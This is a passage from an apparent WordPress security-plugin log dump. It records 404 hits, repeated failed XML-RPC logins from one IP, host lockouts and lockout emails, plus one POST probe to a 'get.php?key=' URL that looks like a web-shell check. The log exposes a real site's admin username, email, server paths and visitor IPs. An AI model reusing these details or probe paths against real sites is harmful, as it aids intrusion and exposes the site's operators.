Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632146936.4644548892974853515625;s:12:\"REQUEST_TIME\";i:1632146936;}}','notice','2021-09-20 14:08:58','2021-09-20 14:08:56',72623584,72707328,'http://zphiblgz.org/contact/',1,0,'23.254.56.32'),(97285,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632137685.3373858928680419921875;s:12:\"REQUEST_TIME\";i:1632137685;}}','notice','2021-09-20 11:34:47','2021-09-20 11:34:45',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'46.63.232.80'),(97286,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632144196.0895531177520751953125;s:12:\"REQUEST_TIME\";i:1632144196;}}','notice','2021-09-20 13:23:18','2021-09-20 13:23:16',72605384,72689152,'http://zphiblgz.org/application',1,0,'44.194.255.212'),(97284,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:21:\"HTTP_CONTENT_LANGUAGE\";s:20:\"en-US;q=0.5,en;q=0.3\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632137535.92101001739501953125;s:12:\"REQUEST_TIME\";i:1632137535;}}','notice','2021-09-20 11:32:18','2021-09-20 11:32:16',72647960,72731728,'http://zphiblgz.org/downloader',1,0,'70.39.234.243'),(97282,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:15:\"pr@zphiblgz.org\";}s:7:\"subject\";s:40:\"[zphiblgz.org] Site Lockout Notification\";}','debug','2021-09-20 09:50:31','2021-09-20 09:50:30',73931144,74010360,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97283,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"icwp-wpsf-126266237\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"191\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632132362.6598980426788330078125;s:12:\"REQUEST_TIME\";i:1632132362;}}','notice','2021-09-20 10:06:04','2021-09-20 10:06:02',73379264,74010328,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97281,0,'lockout','host-lockout::39.33.143.158','a:14:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"39.33.143.158\";s:7:\"user_id\";b:0;s:8:\"username\";b:0;s:14:\"module_details\";a:6:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:5:\"label\";s:11:\"Brute Force\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2021-09-20 04:50:30\";s:17:\"lockout_start_gmt\";s:19:\"2021-09-20 09:50:30\";s:15:\"lockout_context\";s:423:\"O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"39.33.143.158\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}\";s:14:\"lockout_expire\";s:19:\"2021-09-20 05:05:30\";s:18:\"lockout_expire_gmt\";s:19:\"2021-09-20 10:05:30\";s:12:\"lockout_host\";s:13:\"39.33.143.158\";}','action','2021-09-20 09:50:31','2021-09-20 09:50:30',73412496,74010360,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97280,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"icwp-wpsf-293115525\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"195\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632131429.8080708980560302734375;s:12:\"REQUEST_TIME\";i:1632131429;}}','notice','2021-09-20 09:50:31','2021-09-20 09:50:30',73379304,74010360,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97279,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1685363730\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"193\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632131368.61476802825927734375;s:12:\"REQUEST_TIME\";i:1632131368;}}','notice','2021-09-20 09:49:30','2021-09-20 09:49:28',73379304,74010360,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97278,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1682666916\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"191\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632131308.039927959442138671875;s:12:\"REQUEST_TIME\";i:1632131308;}}','notice','2021-09-20 09:48:29','2021-09-20 09:48:28',73379264,74010328,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97277,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1599993408\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"194\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632131247.148293972015380859375;s:12:\"REQUEST_TIME\";i:1632131247;}}','notice','2021-09-20 09:47:29','2021-09-20 09:47:27',73379304,74010360,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97276,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1083057086\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"191\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632131184.5256149768829345703125;s:12:\"REQUEST_TIME\";i:1632131184;}}','notice','2021-09-20 09:46:26','2021-09-20 09:46:24',73379264,74010328,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97275,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"33\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632130885.2277629375457763671875;s:12:\"REQUEST_TIME\";i:1632130885;}}','notice','2021-09-20 09:41:27','2021-09-20 09:41:25',72657376,72741816,'https://zphiblgz.org/get.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG',1,0,'185.191.34.215'),(97274,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1230248213\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"191\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632130261.5005710124969482421875;s:12:\"REQUEST_TIME\";i:1632130261;}}','notice','2021-09-20 09:31:03','2021-09-20 09:31:01',73379264,74010328,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97273,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:15:\"pr@zphiblgz.org\";}s:7:\"subject\";s:40:\"[zphiblgz.org] Site Lockout Notification\";}','debug','2021-09-20 09:15:41','2021-09-20 09:15:38',74036872,74192400,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97272,0,'lockout','host-lockout::39.33.143.158','a:14:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"39.33.143.158\";s:7:\"user_id\";b:0;s:8:\"username\";b:0;s:14:\"module_details\";a:6:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:5:\"label\";s:11:\"Brute Force\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2021-09-20 04:15:38\";s:17:\"lockout_start_gmt\";s:19:\"2021-09-20 09:15:38\";s:15:\"lockout_context\";s:423:\"O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"39.33.143.158\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}\";s:14:\"lockout_expire\";s:19:\"2021-09-20 04:30:38\";s:18:\"lockout_expire_gmt\";s:19:\"2021-09-20 09:30:38\";s:12:\"lockout_host\";s:13:\"39.33.143.158\";}','action','2021-09-20 09:15:40','2021-09-20 09:15:38',73583760,74192400,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97271,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"icwp-wpsf-973864164\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"188\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632129338.5998089313507080078125;s:12:\"REQUEST_TIME\";i:1632129338;}}','notice','2021-09-20 09:15:40','2021-09-20 09:15:38',73555704,74192400,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97270,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-2022304503\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"187\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632129275.67916393280029296875;s:12:\"REQUEST_TIME\";i:1632129275;}}','notice','2021-09-20 09:14:37','2021-09-20 09:14:35',73379264,74010328,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97269,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:20:\"icwp-wpsf-1008438968\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"186\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632129214.4676420688629150390625;s:12:\"REQUEST_TIME\";i:1632129214;}}','notice','2021-09-20 09:13:36','2021-09-20 09:13:34',73379264,74010328,'https://zphiblgz.org/xmlrpc.php',1,0,'39.33.143.158'),(97268,0,'brute_force','invalid-login::username-zphiblgz','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:19:\"icwp-wpsf-876664408\";a:1:{i:0;s:57:\"Please check that box to say you\'re human, and not a bot.\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}s:8:\"username\";s:8:\"zphiblgz\";s:7:\"user_id\";i:0;s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:3:\"193\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:38:\"/home2/zphiblgz/public_html/xmlrpc.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632129153.4300119876861572265625;s:12:\"REQUEST_TIME\";i:1632129153;}}','notice','2021-09-20 09:12:35','2021-09-20 